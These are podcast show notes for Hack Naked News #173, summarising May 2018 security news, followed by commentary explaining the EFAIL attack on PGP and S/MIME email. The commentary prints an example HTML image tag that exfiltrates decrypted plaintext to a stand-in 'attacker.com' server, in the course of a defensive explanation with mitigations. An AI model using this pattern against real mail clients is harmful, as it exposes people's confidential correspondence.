HNNEpisode173

From Paul's Security Weekly
Jump to: navigation, search

Hack Naked News #173

Recorded May 15, 2018 at G-Unit Studios in Rhode Island!

Episode Audio

Hosts

  • Paul Asadoorian
    Embedded device security researcher, security podcaster, and CEO of Active Countermeasures .
  • Jason Wood
    Security consultant, penetration tester, sysadmin, and Founder of Paladin Security.
  • Annoucements:

    • Go to itpro.tv/securityweekly and use the code Secweekly30 to try it FREE for 7 days, and receive 30% off your monthly membership for the lifetime of your active subscription.
    • Check out our On-Demand material! Some of our previously recorded webcasts are now available On-Demand at: securityweekly.com/ondemand.
    • Our upcoming webcast with Javelin Networks on Overcoming the Limitations of Privilege Account Management is being held on May 24 from noon - 1:00pm

    Security News

    1. Police dog sniffs out USB drive to snare school hacker - Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down. The attack started as a Phishing attack, then a teacher fell for it and entered their login credentials. The student used the login credentials and apparently did not mask his IP address. They traced the IP address to his house, and the dog found the USB drive.
    2. Secrets of the Wiper: Inside the World's Most Destructive Malware - Cisco Talos researcher Vitor Ventura, along with contributions from Martin Lee, noted in a report published on Tuesday, that malware with destructive payloads has been around since the early days of virus development. However, the delivery methods and level of destruction of wiper malware have evolved. Damage can range from the overwriting of specific files to the destruction of the entire file system; and the amount of data impacted and the difficulty of the recovery process is a direct consequence of the technique used. Motives can range from covering their tracks, which also gives away the fact that you've been hacked (potentially) and sending a political message.
    3. Samsung Patches Six Critical Bugs in Flagship Handsets - Samsung began rolling out patches over the weekend to fix six critical bugs found in its flagship Android handsets as part of its May patch bulletin. Flaws range from a remote code execution bug to a buffer overflow vulnerability, plus a peek-and-poke command bug that leaves memory locations open on targeted devices. The vulnerabilities were previously disclosed by Google, and Samsung is playing catch up, so update now.
    4. Hacking train Wi-Fi may expose passenger data and control systems - The research was conducted over several years, said Pen Test's Ken Munro. "In most cases they are pretty secure, although whether the Wi-Fi works or not is another matter," he added. But in a handful of cases Munro was able to bridge the wireless network to the wired network and find a database server containing default credentials, enabling him to access the credit card data of customers paying for the Wi-Fi, including the passenger's name, email address and card details. This seems to me like a similar threat against airplanes, where there is a lot of speculation and perhaps no major threat.
    5. Decade-old Efail flaws can leak plaintext of PGP- and S/MIME-encrypted emails - The most serious vulnerabilities have resided in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. Flaws in the way the programs handle emails with multiple body parts make it possible to embed invisible snippets of previously obtained encrypted text in new emails. By also including the Web address of an attacker-controlled server, the newly sent emails can cause the programs to send the corresponding plaintext to the server. The surreptitious exfiltration works against both the PGP and S/MIME standards. The article in the show notes contains a link to the full details, including the researchers original paper. Many vendors have issued patches already.
    6. Kaspersky Lab to shift US customer data from Russia to Switzerland | ZDNet - On Tuesday, the cybersecurity firm said that "a number of core processes" will be shifted from Russia, including customer data storage systems and processing "for most regions." By the end of 2019, Kaspersky Lab hopes to have moved the infrastructure used for US customer data storage and processing to Zurich. Customer data from Europe, Singapore, Australia, Japan, and South Korea will also be moved, with other countries to follow.
    7. Chili's Discloses Data Breach Exposing Payment Card Information - Restaurant chain Chili's is the latest retailer to report a data breach involving point of sale (PoS) security. Brinker International, which operates over 1,600 Chili's restaurants globally, announced the data breach on May 12, after becoming aware of the security incident the day before. The company did not reveal how many customers have been impacted by the breach, though it did state that payment card information was stolen over a two-month period.
    8. Simple bug could lead to RCE flaw on apps built with Electron Framework - A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers. Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
    9. Hackers Reveal How Code Injection Attack Works in Signal Messaging App - Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina. The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction. This appears to be limited to the Signal Desktop app: The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.

    Expert Commentary

    Even more details on EFail PGP vulnerability My newsfeed is full of articles and posts on the PGP/GPG and S/MIME vulnerability that could allow an attacker to read decrypted email content. Understandably, you may feel this is pretty alarming news. PGP is supposed to be a very secure way to send an encrypted message via email, but now even that isn’t safe. Then you read the recommendation that is prominently displayed in the EFF’s post on the vulnerability. “Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.” Wait, so it’s better to send clear text email?? (And no, the researchers and the EFF are not advocating using clear text email. They recommend using other secure messaging systems instead.). So let’s talk through some of the highlights of this flaw and see if we can make more sense of what it means to us.

    First, do you use PGP to encrypt emails and send sensitive data to another party? I’ve used it occasionally, but not regularly. So the impact to me is actually fairly minimal. The same may apply to you. For those of you who do regularly use it, then you need to make some changes to how you transmit sensitive data. Here’s some of the requirements needed to exploit this flaw.

    1. The attacker already has to have access to network traffic, the email server, or other systems so that they can capture and modify the encrypted message. Your attacker has to have this access and be targeting this type of data. Think intelligence agency here. If you are a Tibetan activist, then this could be a threat to you.

    2. You have to have your email client configured to use PGP and S/MIME and automatically render external content. Such as downloading images into your HTML format email.

    The rendering of remote content is an issue because of the way the attack plays out. The attacker intercepts the email on the way to your inbox and adds some additional content before and after the block of cipher text in the message. The added content before is an HTML image tag that points to the attacker’s server. The tag isn’t actually closed before the cipher text block. Basically, it’s missing the “> needed to close it. The cipher text follows and once that block is complete the attacker includes the “> to close the image tag. Your email client decrypts the encrypted message and now has an HTML formatted email that includes an image tag like <img src=“http://attacker.com/encrypted message here”>. The email client then attempts to download the image and includes the encrypted content as part of the URL. The attacker checks their web server logs and there’s the “secret” message. You will almost certainly notice that your encrypted message didn’t render right and something is obviously wrong.

    Ok, that’s definitely bad, but we’ve known that there have been issues with dynamically loading remote content in emails for years. This just pairs it up with functionality that is supposed to be inherently secret and makes it not secret. There are some other issues that the researchers have documented in their research paper. I have a link to that paper in the show notes.

    The take away from this is that this vulnerability isn’t an issue with PGP itself, but with how it is implemented in email clients and encryption add ons. Also, keep mind that the attacker already has significant access into your systems and/or network traffic. If you are concerned that you could be a target for this, you can switch to other mechanisms for transmitting data. Signal is a recommendation from the EFF, though we’ve reported previously that they are getting some heat for using domain fronting and that could impact their service. You can not use email add ons to encrypt and decrypt your PGP messages. Do that outside of the email client. Configure your client not to automatically fetch and render remote content. All of these will negate this attack.

    https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

    https://efail.de/efail-attack-paper.pdf

    https://www.grahamcluley.com/despite-efail-the-sky-is-not-falling/



    Follow us on Twitter Watch Security Weekly videos Listen to Security Weekly Security Weekly fan page Connect with Paul Google+